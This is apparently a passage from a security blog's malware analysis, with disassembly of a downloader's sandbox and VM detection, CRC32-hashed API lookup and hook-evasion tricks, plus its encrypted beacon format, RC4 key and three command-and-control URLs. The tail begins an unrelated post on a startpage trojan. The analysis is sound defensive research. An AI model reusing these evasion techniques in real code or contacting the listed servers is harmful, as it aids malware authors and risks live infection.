<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E98 jz
short loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E9A<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E9A loc_401E9A:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E9A
cmp dword ptr [ebp-364h],
'xobv'<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401EA4
jz short loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401EA6<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401EA6 loc_401EA6:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401EA6
cmp dword ptr [ebp-364h],
'umeq'<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="margin-left: 1.0in; mso-add-space: auto;">
<span style="font-family: "Calibri","sans-serif"; font-size: 8.0pt; line-height: 115%; mso-ansi-language: EN-PH; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">_1961:00401EB0 jz short loc_401EBF</span></div>
<div class="MsoListParagraphCxSpFirst" style="margin-left: 1.0in; mso-add-space: auto;">
<span style="font-family: "Calibri","sans-serif"; font-size: 8.0pt; line-height: 115%; mso-ansi-language: EN-PH; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><br /></span></div>
<ul>
<li><span style="text-indent: -0.25in;">Checks process names for </span><span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%; text-indent: -0.25in;">'SbieDll.dll'</span><span style="text-indent: -0.25in;">
(Sandboxie)</span></li>
<li><span style="text-indent: -0.25in;">Checks process names against stored hashes. There
is no way to revert these hashes back to the original string that was used but we
were able to map two hashes to </span><span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%; text-indent: -0.25in;">wireshark.exe </span><span style="text-indent: -0.25in;">and</span><span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%; text-indent: -0.25in;"> vmtoolsd.exe</span><span style="text-indent: -0.25in;">.</span></li>
</ul>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CB6
xor eax, 0E17176Fh<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CBB
cmp eax, 97CA535Dh<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CC0
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CC6
cmp eax, 23928ADBh<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CCB
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CD1
cmp eax, 6A231AA1h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CD6
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CDC
cmp eax, 6DD2531Bh<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CE1
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CE7
cmp eax, 3A8B8BE4h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CEC
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CF2
cmp eax, 3A51FCA1h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CF7
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401CFD
cmp eax, 55BEA691h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D02
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D08
cmp eax, 32F5A99Ch<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D0D
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D13
cmp eax, 3351E744h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D18
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D1E
cmp eax, 79B90798h ; wireshark.exe<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D23
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D29
cmp eax, 0FD53FE32h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D2E
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D34 cmp
eax, 23A97A00h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D39
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D3F
cmp eax, 0ADC6152Bh<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D44
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D4A
cmp eax, 1365FAFEh<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D4F jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D55
cmp eax, 98847CD1h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D5A
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D60
cmp eax, 299BC837h ; vmtoolsd.exe<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D65
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D6B
cmp eax, 35E8EFEAh<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D70
jz loc_401EBF<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D76
cmp eax, 632434B6h<o:p></o:p></span></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401D7B
jz loc_401EBF</span><o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle">
<br /></div>
<div class="MsoListParagraphCxSpMiddle">
As mentioned earlier, the behavior under "A Different
Payload" section will be run if it detects any of these processes or
strings.</div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
If your volume information matches the hash 0x20C7DD84h, these
mentioned checks are skipped:<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C08
call dword ptr [ebp-10h] ; GetVolumeInformation<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C0B
lea eax, [ebp-36Ch]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C11
push eax<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C12
call sub_4016ED<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C17
cmp eax, 20C7DD84h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401C1C
jz loc_401EB2<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Another anti-analysis technique it used is retrieval of API addresses
by using CRC32 hashes. <o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DBB
push 0C13A7AD3h ; RegOpenKeyA<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DC0
push esi<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DC1
call GetAPIVaFromCrc32<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DC6
mov [ebp-34h], eax<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DC9
test eax, eax<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DCB
jz loc_401EB2<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DD1
push 0B039ADFEh ; RegQueryValueExA<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DD6
push esi<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DD7
call GetAPIVaFromCrc32<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DDC
mov [ebp-38h], eax<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DDF
test eax, eax<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DE1
jz loc_401EB2<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DE7
push 0A9290135h ; RegCloseKey<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DEC
push esi<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DED
call GetAPIVaFromCrc32<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401DF2
mov [ebp-3Ch], eax<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
A call to the RegOpenKeyA API would look something like this:<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E3C
push 80000002h<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E41
call dword ptr [ebp-34h]<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Using static analysis, one would not be able to easily see that
the API called is RegOpenKeyA.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Yet another anti-analysis technique it uses is a second way
of calling its APIs. If in the previous example, the API address is stored
directly in <span style="font-size: 8.0pt; line-height: 115%;">[ebp-34h], </span>now
the API address is stored layers deeper in the memory. <o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CCC: FF25C061FA7F jmp d,[7FFA61C0]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CD2: FF25BC61FA7F jmp d,[7FFA61BC]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CD8: FF25B861FA7F jmp d,[7FFA61B8]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CDE: FF25B461FA7F jmp d,[7FFA61B4]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CE4: FF25A461FA7F jmp d,[7FFA61A4]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CEA: FF25A061FA7F jmp d,[7FFA61A0]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CF0: FF259C61FA7F jmp d,[7FFA619C]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">00004CF6: FF259861FA7F jmp d,[7FFA6198]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
Dumping the memory at address 0x7FFA61BC, it leads us to
another address 0x7FF90020. Notice the difference in values from one dword to
another is 0x10:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9XOP_mKpd5JHfTmJe0J4reNu3setUNaIlk4ZewzznrI7Z_1VzvDwTsIeU-CGYH6q8pm2QJhPuyFrlE2rj5QbV30pC2vuKrYQNmH6ZW09u0rsR0bqbVknj6FUrkSGCruGpdjV37GMKhG7C/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9XOP_mKpd5JHfTmJe0J4reNu3setUNaIlk4ZewzznrI7Z_1VzvDwTsIeU-CGYH6q8pm2QJhPuyFrlE2rj5QbV30pC2vuKrYQNmH6ZW09u0rsR0bqbVknj6FUrkSGCruGpdjV37GMKhG7C/s1600/2.png" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
At address 0x7FF90020, the instruction would look like this:</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_wKd6W-lETX8ZtFYfxydSUps_bpFqtaEG-cN_bpiZEX-kO4ki2RxOfycmsMRGbNhxtR_HRzmqK1loC30JljYoMFgAokG04p_6XX3aXpwgQ3sctmBjG0w8MyDhizIcDEgq95RjJe-uIT5y/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_wKd6W-lETX8ZtFYfxydSUps_bpFqtaEG-cN_bpiZEX-kO4ki2RxOfycmsMRGbNhxtR_HRzmqK1loC30JljYoMFgAokG04p_6XX3aXpwgQ3sctmBjG0w8MyDhizIcDEgq95RjJe-uIT5y/s1600/3.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9rUXb6S9MFvAJkWyj91MHMby4qQlvWH2UYB8X84xJXCfuOQOqAwwFz6osPC47urR1dT02F1kH87RlP-urwf6hW6ycMsgjVPzgdyye-CGxLGKG9zvS8iuCZXh51OgekAr8KJpk_ggimSxF/s1600/4.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9rUXb6S9MFvAJkWyj91MHMby4qQlvWH2UYB8X84xJXCfuOQOqAwwFz6osPC47urR1dT02F1kH87RlP-urwf6hW6ycMsgjVPzgdyye-CGxLGKG9zvS8iuCZXh51OgekAr8KJpk_ggimSxF/s1600/4.png" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
The first instruction <span style="font-size: 8pt; line-height: 115%;">MOV EDI,EDI</span> is actually a copy of SetFileAttributesW’s
first instruction. The JMP instruction points to the next instruction in
SetFileAttributesW. See dump at 0x7C8314DD:</div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixM_L-4Ho1ImL1O6py7v0EozL9STSBy-jPKkNK-EhVRXnn_iHa70or0_tu6YsKdXFIzkGdPAuX3ZWZsdn6p_SBueBfn6j3gbmpHbHINTNRDaXT9qm3Ci5imqQVjHWTnznIWMd4P5D68ado/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixM_L-4Ho1ImL1O6py7v0EozL9STSBy-jPKkNK-EhVRXnn_iHa70or0_tu6YsKdXFIzkGdPAuX3ZWZsdn6p_SBueBfn6j3gbmpHbHINTNRDaXT9qm3Ci5imqQVjHWTnznIWMd4P5D68ado/s1600/5.png" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Some debuggers only maps the API name to its starting address.
As in this case, the debugger was not able to give out the API’s name. This is
a bit sophisticated anti-analysis technique. For the malware to accomplish
this, it has a built-in disassembler inside (more on this in appendix).</div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: left;">
Additional dump at address 0x77F9000 (in increments of 0x10,
one instruction is stored followed by an E9 jump):<o:p></o:p></div>
<div class="MsoNormal" style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB4hj_GAEhfYg-JV0aUSwWtXFSeFcJunbBbfBnw51YiPOcn0jP_mnkqpMGi9FFzaHsSOwoCpv3eGbLDgRyeik4nZICXn4KL13Fx4NrjjkTzae-o5uqX2KTUCCc7J0_rFEgFqrOp-GIW_Tt/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB4hj_GAEhfYg-JV0aUSwWtXFSeFcJunbBbfBnw51YiPOcn0jP_mnkqpMGi9FFzaHsSOwoCpv3eGbLDgRyeik4nZICXn4KL13Fx4NrjjkTzae-o5uqX2KTUCCc7J0_rFEgFqrOp-GIW_Tt/s1600/6.png" /></a></div>
<div class="MsoNormal" style="text-align: left;">
For the downloader part, the malware also authenticates the
data that was returned by the server. It expects the server to return a data that
will match a hash in the code. It will
only download the next component if it successfully authenticates the data
returned by the server. </div>
<div class="MsoNormal" style="text-align: left;">
<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Network Activity<o:p></o:p></b></div>
<div class="MsoNormal">
It assembles a string with the following format:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">id:%lu|bid:%lu|bv:%lu|os:%lu|la:%lu|rg:%lu<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
An example would be: <o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">"id:1957944140|bid:2100|bv:120|os:849|la:31191969|rg:1"<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
It encrypts the string with RC4 using the key <span style="font-size: 9.0pt; line-height: 115%;">b8d4b5527da0f28c47cd82d86557d4dc</span>
and encodes the ciphertext using Base64. The encoded string is sent via HTTP
POST requests to the following URLs:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://37.139.47.56/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://62.76.187.171/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://85.143.166.119/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
This is illustrated by the following packet capture:<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8NKqEPi2lXIS6Ih3g1QsAliZIS5vCfVnsyCPBzZ1FQ37jqTKTmzgd_N9wVVajrPZSY7gwnCq53yorW-oQ-ckLjRbwO1kDp8NlhfnjbserlxAbqcOAnFHdn6LxF51udp4bqQGqB-rYfBtL/s1600/7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8NKqEPi2lXIS6Ih3g1QsAliZIS5vCfVnsyCPBzZ1FQ37jqTKTmzgd_N9wVVajrPZSY7gwnCq53yorW-oQ-ckLjRbwO1kDp8NlhfnjbserlxAbqcOAnFHdn6LxF51udp4bqQGqB-rYfBtL/s1600/7.png" height="446" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Appendix A. Disassembler</b></div>
<div class="MsoNormal">
<b><br /></b></div>
<div class="MsoNormal">
Querying parts of the following code in Google tells us it is
a disassembler routine:<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040101F
cmp word ptr [esi-1], 20CDh<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401025
jnz short loc_401031<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401027
inc esi<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401028
lodsd<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401029
jmp loc_40112F<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102E ; ---------------------------------------------------------------------------<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102E<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102E loc_40102E: ; CODE XREF:
sub_401000+1Dj<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102E
lodsb<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040102F
inc ah<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401031<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401031 loc_401031: ; CODE XREF:
sub_401000+25j<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401031
shr eax, 1<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401033
mov al,
ss:byte_401147[ebp+eax]<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040103A
jb short loc_40103F<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:0040103C
shr eax, 4<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Interesting to note is that one of the search hits leads to a
disassembler called <span style="background: white; color: #333333; font-family: Consolas; font-size: 9.0pt; line-height: 115%;">Catchy32 v1.6 - Length Disassembler
Engine 32bit</span> which is part of a bootkit malware:<o:p></o:p></div>
<div class="MsoNormal">
<a href="https://github.com/hzeroo/Carberp/blob/master/source%20-%20absource/pro/all%20source/bootkit.old/BKGen/i386/Catchy32.inc">https://github.com/hzeroo/Carberp/blob/master/source%20-%20absource/pro/all%20source/bootkit.old/BKGen/i386/Catchy32.inc</a><o:p></o:p></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
Anonymoushttp://www.blogger.com/profile/06438364220975927250noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-16200391158964182092014-05-01T23:29:00.001-07:002014-05-26T00:48:25.250-07:00A Trojan Startpage Bundled Promo<div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt; orphans: 2; text-align: -webkit-auto; widows: 2;">
<b><span style="font-family: inherit; font-size: 15px; font-weight: normal; vertical-align: baseline; white-space: pre-wrap;">Trojan Startpage is a type of trojan that forcefully changes the default start page of a web browser.</span></b></div>
<span style="font-family: inherit;"><b style="orphans: 2; text-align: -webkit-auto; widows: 2;"><br /></b>
</span><br />
